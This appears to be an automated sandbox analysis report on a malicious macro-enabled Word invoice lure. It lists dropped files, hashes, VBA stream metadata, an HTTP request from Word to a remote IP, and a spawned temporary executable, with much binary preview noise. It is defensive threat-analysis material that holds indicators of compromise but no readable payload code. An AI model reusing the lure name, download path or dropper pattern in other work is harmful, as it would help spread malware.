                                                                                                                                                  SHA1:BCC5DC3222034D3F257F1FD35889E5BE90F09B5F
                                                                                                                                                  SHA-256:4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
                                                                                                                                                  SHA-512:85C94763698448275AD996805FD59A3A4789BEFB79BE2175E2BBFED1CE9A2D424500DCAF42FFA225C33FE7090F0FEDF6B7BED63168FEC64D112CD09559829AFE
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...o...l...h..l..m.o.l...m..l...i..l...e...l....l...n..l.Rich.l.................PE..L...4^?..................b..........Pa............@..........................@............@.............................................hg...................0..D.......T........................... .......................lm..`....................text....a.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat..............................@....rsrc...hg.......h..................@..@.reloc..D....0......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):201
                                                                                                                                                  Entropy (8bit):5.110875983732391
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3bIGKCezocKqD:J0+oxBeRmR9etdzRxbIYez1T
                                                                                                                                                  MD5:6DFF44B8B60DD046290A5420717F052E
                                                                                                                                                  SHA1:2339B6BC052682B5CC618733AEEE776037485D3E
                                                                                                                                                  SHA-256:2E519B2E823E2503B635A59BBC29A00170F18F86BC7F5330563188B105FF87D7
                                                                                                                                                  SHA-512:02E47727BE33B93C4CA538A0E089720C0AC6D7CDC758216ECE0AD3380A75C151D9E2C6BA66A564209E3AC750720CBD3E415FA202ADE20852785D507C488076C3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "rm" was not found on this server.</p>.</body></html>.
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):50176
                                                                                                                                                  Entropy (8bit):4.448125275792641
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:tSeDMwfrJProZex692dfGuRndWms9mJ2b2TaicChx/6SErnbD9S6yUDx3H/WmNHF:tS6XtcDYTxD/m3D9RNfVmaOe1ixGF9z
                                                                                                                                                  MD5:5C3899053A1E3C08DBFF977B0A68AB3C
                                                                                                                                                  SHA1:06A52736C5024E7524B6C4D62E51D57E9D1DAB44
                                                                                                                                                  SHA-256:EF70EE70DE35B56F07A7E5397E0D2FC35901729D899F01D97E12B65AC6C2B45E
                                                                                                                                                  SHA-512:42DAF9FB0FCD0E6F39EEA85ADE00E0B244564EC9684BEF214F36DD7A0BEF7D32C6FC8D53E15CF7D73435DD2DE067D79D79EB089DCC4631E585EDF4CB9C6E58A5
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F...........&........................................................................................................... ...!..."...#...$...%.......'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7.......9...:...;...<...=.......?...@...A...B...C...D...E...8...\...H...I...J...M...L.......N...O...P...Y...R...S...T...U...V...W...X...K...Z...[...].......^..._...`...........................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):115
                                                                                                                                                  Entropy (8bit):4.714654512289214
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:bDuMJlKCsAWWIKGHjXbbBCmX1mWfsAWWIKGHjXbbBCv:bC0s+GHjXbbBggs+GHjXbbBs
                                                                                                                                                  MD5:CBD62476A1135C121FCB69226FC6EE4C
                                                                                                                                                  SHA1:AA113B9F44A102C38F72BD322052EEDC5F92D398
                                                                                                                                                  SHA-256:20A1C60E63FE08C27CA3DE3BCF4F12683005F925193266204AFBD17E8F13829D
                                                                                                                                                  SHA-512:B733E41B4B76FC6A56060BE50357B07861F66536F2927303EBD21F2E03B497675004A3987BA768B9405260427B3CFED9B3920D5A52258975C48C92453E32DC62
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[folders]..Templates.LNK=0..wpswireless-invoice-08.11.22.doc.LNK=0..[doc]..wpswireless-invoice-08.11.22.doc.LNK=0..
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:46 2022, mtime=Thu Aug 11 23:58:01 2022, atime=Thu Aug 11 23:57:53 2022, length=2256213, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1145
                                                                                                                                                  Entropy (8bit):4.69312404308806
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8vhaUO/EkRUpMcuElPCH2KAf1YIXe+WvUQPuDIrzfjAU/IvjXLtBIrzXDTDiP5i6:8vsx7LVAfTvQlrAUAvrSXD+g7aB6m
                                                                                                                                                  MD5:AFFCFFB0E94A5E7269CFC282CD4C09F7
                                                                                                                                                  SHA1:0D7C9D68CC3CF9E789C0BE0C14DCF928D7949947
                                                                                                                                                  SHA-256:BDC4E15737DDBC6476F974D7942844DC35FB6F4DE42921BC1F0DDFD5477C935A
                                                                                                                                                  SHA-512:69DAE40D380598E1BABF175D45205494993B47172442F841C92C5721F47384041E00608B9E8F29AD5610164928C212BAA5CDE078DC55B71D7452BDD77FBA65A1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:L..................F.... ....E...3...+b...........Um"..........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U3.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..U3......S.....................Nd.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..U4......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.Um"..U;. .WPSWIR~1.DOC..r......hT...U;.....h.........................w.p.s.w.i.r.e.l.e.s.s.-.i.n.v.o.i.c.e.-.0.8...1.1...2.2...d.o.c.......f...............-.......e...........>.S......C:\Users\user\Desktop\wpswireless-invoice-08.11.22.doc..7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.w.p.s.w.i.r.e.l.e.s.s.-.i.n.v.o.i.c.e.-.0.8...1.1...2.2...d.o.c.........:..,.LB.)...As...`.......X.......855271...........!a..%.H.VZAj...U............-..!a..%.H.VZAj...U............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):162
                                                                                                                                                  Entropy (8bit):2.2346921606678025
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Rl/ZdtIc1/97UFlplttlqKEjFtttoln:RtZv3UBlg5ttOn
                                                                                                                                                  MD5:926A99CC191B9D2D2FB12C50667D7898
                                                                                                                                                  SHA1:901715232E9B4345F1D4CAE1F457D17CBEAE51CA
                                                                                                                                                  SHA-256:F2A86CF265EC47A63C321CB294480285D5AD562F9036B8B3EA67E281AE56B044
                                                                                                                                                  SHA-512:52F5136AB089FEF72F4375CFFBB922C29396E42FF6D6CD74A5885880D4F1179BDCD9908A3105AC3B36CFC3C25E60A84D51C9EA0B48F038A9BCD26FA7258991A0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.pratesh................................................p.r.a.t.e.s.h...........#..9............................'..:..........T.......6C........;..;..............
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2
                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):162
                                                                                                                                                  Entropy (8bit):2.2346921606678025
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Rl/ZdtIc1/97UFlplttlqKEjFtttoln:RtZv3UBlg5ttOn
                                                                                                                                                  MD5:926A99CC191B9D2D2FB12C50667D7898
                                                                                                                                                  SHA1:901715232E9B4345F1D4CAE1F457D17CBEAE51CA
                                                                                                                                                  SHA-256:F2A86CF265EC47A63C321CB294480285D5AD562F9036B8B3EA67E281AE56B044
                                                                                                                                                  SHA-512:52F5136AB089FEF72F4375CFFBB922C29396E42FF6D6CD74A5885880D4F1179BDCD9908A3105AC3B36CFC3C25E60A84D51C9EA0B48F038A9BCD26FA7258991A0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.pratesh................................................p.r.a.t.e.s.h...........#..9............................'..:..........T.......6C........;..;..............
                                                                                                                                                  File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                  Entropy (8bit):7.994091181083785
                                                                                                                                                  TrID:
                                                                                                                                                  • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                  • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                  • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                  File name:wpswireless-invoice-08.11.22.doc
                                                                                                                                                  File size:2350727
                                                                                                                                                  MD5:672ff75cfa223733b4d42382089a57b2
                                                                                                                                                  SHA1:02dd6b448c2373dc1223724b1ab1aff920528aa6
                                                                                                                                                  SHA256:aabc9295e27a673dcfb902960b8196a561923cef78ddb061956cb627fcfa782c
                                                                                                                                                  SHA512:67ae70869362e5f55cec2655cbe924387baed91a0104abfb47ead979aac7b56684af5e5413b305ea1fdaeb5ccd7053e7ff398a341dd2fcc7c8b325f05ac2e272
                                                                                                                                                  SSDEEP:49152:eT3UFkBPa/06xtvpz126ejPDkZ3T4EtUxFc2mpXfQK9B:qUke3v912tAJT45xF6pXfQK7
                                                                                                                                                  TLSH:3BB533A9751FE67ED0C8DE700D12EA9433A7E9DE4AC8049CC234CAD21DFC225B55F85A
                                                                                                                                                  File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.
                                                                                                                                                  Icon Hash:74f4c4c6c1cac4d8
                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1
                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:False
                                                                                                                                                  Contains Word Document Stream:True
                                                                                                                                                  Contains Workbook/Book Stream:False
                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                  Contains ObjectPool Stream:False
                                                                                                                                                  Flash Objects Count:0
                                                                                                                                                  Contains VBA Macros:True
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/ThisDocument
                                                                                                                                                  VBA File Name:ThisDocument.cls
                                                                                                                                                  Stream Size:2739
                                                                                                                                                  Data ASCII:. . . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t . i o n . . . . . . L . i b " u s e r . 3 2 " A l i a . s " S e t T i . m e r " ( B y V a l . . . . . . . . A s L o n g y . 1 , . . . . . .
                                                                                                                                                  Data Raw:01 0e b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54

                                                                                                                                                  General
                                                                                                                                                  Stream Path:PROJECT
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Stream Size:365
                                                                                                                                                  Entropy:5.260544526473288
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:I D = " { C 6 A 0 3 1 7 C - 6 7 D 6 - 4 9 C 1 - 8 B 7 0 - 9 3 8 0 6 A 5 0 A 3 C E } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E B E 9 2 2 5 9 0 9 5 D 0 9 5 D 0 9 5 D 0 9 5 D " . . D P B = " D 6 D 4 1 F 7 6 E 1 8 A C D 8 B C D 8 B C D " . . G C = " C 1 C 3 0 8 8 D 0 9 8 D 0 9 7 2 " . . . . [ H o s t E x t e n d e r I n f o ] . .
                                                                                                                                                  Data Raw:49 44 3d 22 7b 43 36 41 30 33 31 37 43 2d 36 37 44 36 2d 34 39 43 31 2d 38 42 37 30 2d 39 33 38 30 36 41 35 30 41 33 43 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                                                                                                  General
                                                                                                                                                  Stream Path:PROJECTwm
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:41
                                                                                                                                                  Entropy:3.0773844850752607
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                                                                                                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                  File Type:ISO-8859 text, with no line terminators
                                                                                                                                                  Stream Size:7
                                                                                                                                                  Entropy:1.8423709931771088
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:a . . .
                                                                                                                                                  Data Raw:cc 61 ff ff 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/__SRP_2
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:5100
                                                                                                                                                  Entropy:1.9204222100936061
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . q . . . . . .
                                                                                                                                                  Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/__SRP_3
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:2724
                                                                                                                                                  Entropy:2.7016840900812285
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ` . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . Q . . . . . . . . . . . , . . p . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . ` . Q . . . . . . . . . . . X . . p . . . . . . Q . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 60 00 c1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 10 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/dir
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:486
                                                                                                                                                  Entropy:6.296812220423808
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . A d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . . m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A
                                                                                                                                                  Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 07 41 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Aug 11, 2022 17:58:07.376005888 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 17:58:07.479938030 CEST804974145.8.146.139192.168.2.3
                                                                                                                                                  Aug 11, 2022 17:58:07.480216980 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 17:58:07.488120079 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 17:58:07.591932058 CEST804974145.8.146.139192.168.2.3
                                                                                                                                                  Aug 11, 2022 17:58:07.607016087 CEST804974145.8.146.139192.168.2.3
                                                                                                                                                  Aug 11, 2022 17:58:07.607184887 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 17:58:12.614085913 CEST804974145.8.146.139192.168.2.3
                                                                                                                                                  Aug 11, 2022 17:58:12.614252090 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 17:59:47.779129028 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 17:59:48.090137005 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 17:59:48.699630022 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 17:59:49.902785063 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 17:59:52.402952909 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 17:59:57.403424025 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:00:07.091779947 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                  • 45.8.146.139
                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.34974145.8.146.13980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Aug 11, 2022 17:58:07.488120079 CEST1017OUTGET /fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 45.8.146.139
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Aug 11, 2022 17:58:07.607016087 CEST1018INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 11 Aug 2022 15:58:07 GMT
                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                                                                                  X-Powered-By: PHP/7.2.34
                                                                                                                                                  Content-Length: 201
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 72 6d 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "rm" was not found on this server.</p></body></html>


                                                                                                                                                  Click to jump to process

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:17:57:55
                                                                                                                                                  Start date:11/08/2022
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                  Imagebase:0xa00000
                                                                                                                                                  File size:1937688 bytes
                                                                                                                                                  MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:17:58:08
                                                                                                                                                  Start date:11/08/2022
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe" "C:\Users\user\AppData\Local\Temp\y133.tmp.dll",#1
                                                                                                                                                  Imagebase:0xc0000
                                                                                                                                                  File size:61952 bytes
                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 0%, Metadefender, Browse
                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                  Reputation:high

                                                                                                                                                  No disassembly